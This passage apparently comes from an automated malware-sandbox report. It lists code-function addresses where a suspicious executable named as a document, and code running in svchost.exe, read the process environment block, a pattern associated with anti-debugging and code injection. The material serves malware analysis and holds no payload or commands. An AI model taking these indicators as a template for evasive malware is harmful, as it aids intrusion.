Source: C:\Users\user\Desktop\Doc 784-01965670.exe; Code function: 0_2_0040EB70 LoadLibraryA, GetProcAddress (0_2_0040EB70)
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_03F95530 mov eax, dword ptr fs:[00000030h]0_2_03F95530
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_03F954D0 mov eax, dword ptr fs:[00000030h]0_2_03F954D0
            Source: C:\Users\user\Desktop\Doc 784-01965670.exeCode function: 0_2_03F93EC0 mov eax, dword ptr fs:[00000030h]0_2_03F93EC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]2_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]2_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]2_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]2_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]2_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]2_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5438F mov eax, dword ptr fs:[00000030h]2_2_03B5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5438F mov eax, dword ptr fs:[00000030h]2_2_03B5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B663FF mov eax, dword ptr fs:[00000030h]2_2_03B663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h]2_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h]2_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE3DB mov ecx, dword ptr fs:[00000030h]2_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h]2_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD43D4 mov eax, dword ptr fs:[00000030h]2_2_03BD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD43D4 mov eax, dword ptr fs:[00000030h]2_2_03BD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEC3CD mov eax, dword ptr fs:[00000030h]2_2_03BEC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB63C0 mov eax, dword ptr fs:[00000030h]2_2_03BB63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0634F mov eax, dword ptr fs:[00000030h]2_2_03C0634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C310 mov ecx, dword ptr fs:[00000030h]2_2_03B2C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B50310 mov ecx, dword ptr fs:[00000030h]2_2_03B50310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]2_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]2_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]2_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD437C mov eax, dword ptr fs:[00000030h]2_2_03BD437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C08324 mov eax, dword ptr fs:[00000030h]2_2_03C08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C08324 mov ecx, dword ptr fs:[00000030h]2_2_03C08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C08324 mov eax, dword ptr fs:[00000030h]2_2_03C08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C08324 mov eax, dword ptr fs:[00000030h]2_2_03C08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov ecx, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFA352 mov eax, dword ptr fs:[00000030h]2_2_03BFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD8350 mov ecx, dword ptr fs:[00000030h]2_2_03BD8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402A0 mov eax, dword ptr fs:[00000030h]2_2_03B402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402A0 mov eax, dword ptr fs:[00000030h]2_2_03B402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C062D6 mov eax, dword ptr fs:[00000030h]2_2_03C062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov ecx, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E284 mov eax, dword ptr fs:[00000030h]2_2_03B6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E284 mov eax, dword ptr fs:[00000030h]2_2_03B6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]2_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]2_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]2_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]2_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]2_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]2_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2823B mov eax, dword ptr fs:[00000030h]2_2_03B2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0625D mov eax, dword ptr fs:[00000030h]2_2_03C0625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]2_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]2_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]2_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2826B mov eax, dword ptr fs:[00000030h]2_2_03B2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A250 mov eax, dword ptr fs:[00000030h]2_2_03B2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36259 mov eax, dword ptr fs:[00000030h]2_2_03B36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEA250 mov eax, dword ptr fs:[00000030h]2_2_03BEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEA250 mov eax, dword ptr fs:[00000030h]2_2_03BEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB8243 mov eax, dword ptr fs:[00000030h]2_2_03BB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB8243 mov ecx, dword ptr fs:[00000030h]2_2_03BB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]2_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]2_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]2_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C061E5 mov eax, dword ptr fs:[00000030h]2_2_03C061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B70185 mov eax, dword ptr fs:[00000030h]2_2_03B70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEC188 mov eax, dword ptr fs:[00000030h]2_2_03BEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEC188 mov eax, dword ptr fs:[00000030h]2_2_03BEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD4180 mov eax, dword ptr fs:[00000030h]2_2_03BD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD4180 mov eax, dword ptr fs:[00000030h]2_2_03BD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B601F8 mov eax, dword ptr fs:[00000030h]2_2_03B601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF61C3 mov eax, dword ptr fs:[00000030h]2_2_03BF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF61C3 mov eax, dword ptr fs:[00000030h]2_2_03BF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B60124 mov eax, dword ptr fs:[00000030h]2_2_03B60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04164 mov eax, dword ptr fs:[00000030h]2_2_03C04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04164 mov eax, dword ptr fs:[00000030h]2_2_03C04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov ecx, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF0115 mov eax, dword ptr fs:[00000030h]2_2_03BF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C156 mov eax, dword ptr fs:[00000030h]2_2_03B2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC8158 mov eax, dword ptr fs:[00000030h]2_2_03BC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36154 mov eax, dword ptr fs:[00000030h]2_2_03B36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36154 mov eax, dword ptr fs:[00000030h]2_2_03B36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov ecx, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF60B8 mov eax, dword ptr fs:[00000030h]2_2_03BF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF60B8 mov ecx, dword ptr fs:[00000030h]2_2_03BF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B280A0 mov eax, dword ptr fs:[00000030h]2_2_03B280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC80A8 mov eax, dword ptr fs:[00000030h]2_2_03BC80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3208A mov eax, dword ptr fs:[00000030h]2_2_03B3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C0F0 mov eax, dword ptr fs:[00000030h]2_2_03B2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B720F0 mov ecx, dword ptr fs:[00000030h]2_2_03B720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_03B2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B380E9 mov eax, dword ptr fs:[00000030h]2_2_03B380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB60E0 mov eax, dword ptr fs:[00000030h]2_2_03BB60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB20DE mov eax, dword ptr fs:[00000030h]2_2_03BB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6030 mov eax, dword ptr fs:[00000030h]2_2_03BC6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A020 mov eax, dword ptr fs:[00000030h]2_2_03B2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C020 mov eax, dword ptr fs:[00000030h]2_2_03B2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB4000 mov ecx, dword ptr fs:[00000030h]2_2_03BB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5C073 mov eax, dword ptr fs:[00000030h]2_2_03B5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32050 mov eax, dword ptr fs:[00000030h]2_2_03B32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6050 mov eax, dword ptr fs:[00000030h]2_2_03BB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B307AF mov eax, dword ptr fs:[00000030h]2_2_03B307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE47A0 mov eax, dword ptr fs:[00000030h]2_2_03BE47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD678E mov eax, dword ptr fs:[00000030h]2_2_03BD678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B347FB mov eax, dword ptr fs:[00000030h]2_2_03B347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B347FB mov eax, dword ptr fs:[00000030h]2_2_03B347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]2_2_03B527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]2_2_03B527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]2_2_03B527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBE7E1 mov eax, dword ptr fs:[00000030h]2_2_03BBE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3C7C0 mov eax, dword ptr fs:[00000030h]2_2_03B3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB07C3 mov eax, dword ptr fs:[00000030h]2_2_03BB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6273C mov eax, dword ptr fs:[00000030h]2_2_03B6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6273C mov ecx, dword ptr fs:[00000030h]2_2_03B6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6273C mov eax, dword ptr fs:[00000030h]2_2_03B6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAC730 mov eax, dword ptr fs:[00000030h]2_2_03BAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C720 mov eax, dword ptr fs:[00000030h]2_2_03B6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C720 mov eax, dword ptr fs:[00000030h]2_2_03B6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30710 mov eax, dword ptr fs:[00000030h]2_2_03B30710
